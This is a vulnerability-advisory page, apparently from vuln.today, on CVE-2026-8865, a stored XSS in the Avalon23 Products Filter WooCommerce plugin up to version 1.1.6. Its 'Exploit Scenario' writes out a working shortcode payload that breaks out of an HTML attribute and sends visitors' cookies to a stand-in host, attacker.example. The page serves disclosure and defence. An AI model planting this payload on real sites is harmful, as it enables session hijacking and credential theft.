Skip to main content

Avalon23 Products Filter CVE-2026-8865

| EUVDEUVD-2026-38683 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-24 Wordfence GHSA-hxr4-2fcj-gcw3
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
6.4 MEDIUM

PR:L confirmed by Contributor-level requirement; S:C reflects browser-context execution; UI:N because stored XSS triggers on passive page load without victim action.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jun 24, 2026 - 07:01 vuln.today
CVE Published
Jun 24, 2026 - 05:33 cve.org
MEDIUM 6.4

DescriptionCVE.org

The Avalon23 Products Filter for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'avalon23_qr' shortcode in all versions up to, and including, 1.1.6. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (notably 'title' and 'fixed_link') which are concatenated directly into single-quoted HTML attributes by the AVALON23_HELPER::draw_html_item() helper without esc_attr() or any other encoding. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in Avalon23 Products Filter for WooCommerce (≤1.1.6) allows authenticated Contributors to inject persistent JavaScript via the avalon23_qr shortcode's title and fixed_link attributes, which are concatenated unsanitized into single-quoted HTML attributes by AVALON23_HELPER::draw_html_item(). The payload is stored in the WordPress database and executes in the browser of any user who subsequently visits an injected page, enabling session hijacking, credential theft, or unauthorized administrative actions. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain or compromise Contributor WordPress account
Delivery
Author post with malicious `avalon23_qr` shortcode attribute
Exploit
Payload stored unescaped in database
Execution
Victim loads injected page in browser
Persist
Injected script executes in victim browser context
Impact
Session credentials or cookies exfiltrated to attacker

Vulnerability AssessmentAI

Exploitation Exploitation requires a WordPress account with at minimum Contributor-level privileges, which is necessary to author or edit posts containing shortcodes. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 6.4 (Medium) with vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N accurately reflects the key risk drivers: network-delivered, low-complexity, with Scope Changed (the victim browser becomes the execution context). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A threat actor registers or compromises a Contributor-level WordPress account on the target site, then creates or edits a post embedding a crafted `[avalon23_qr title="x' onmouseover='fetch('https://attacker.example/c?'+document.cookie)" fixed_link="http://example.com"]` shortcode. The payload is stored in the WordPress database unsanitized. …
Remediation No vendor-released patch has been identified at time of analysis for versions up to and including 1.1.6. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-8865 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy